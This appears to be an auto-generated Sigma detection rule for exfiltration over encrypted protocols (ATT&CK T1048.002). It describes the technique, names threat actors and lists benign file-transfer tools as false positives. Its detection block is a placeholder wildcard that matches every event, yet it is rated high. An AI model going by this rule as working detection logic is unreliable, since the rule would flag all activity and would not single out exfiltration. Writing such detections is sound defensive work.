title: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)
id: df00tech-t1048-002
status: experimental
description: "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Common protocols include HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use asymmetric encryption (public-key cryptography) for key exchange, often transitioning to symmetric encryption for bulk data transfer. Because these protocols are widely used for legitimate business purposes, malicious exfiltration traffic can blend in with normal network activity. Threat actors such as APT28, CURIUM, and Storm-1811 have leveraged HTTPS, SMTPS, and SCP respectively for data exfiltration."
references:
  - https://attack.mitre.org/techniques/T1048/002/
  - https://df00tech.com/detections/T1048.002
author: df00tech
date: 2026/04/16
tags:
  - attack.t1048.002
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "IT administrators using WinSCP, FileZilla, or SCP for legitimate file transfers to managed servers"
  - Backup software using SFTP/FTPS to transfer data to authorized cloud storage or DR sites
  - "DevOps pipelines using Rclone or curl for legitimate artifact publishing to cloud storage (S3, Azure Blob, GCS)"
  - Security teams running vulnerability scans or transferring forensic images via SFTP
  - Software update mechanisms that download or upload telemetry over HTTPS to vendor endpoints
level: high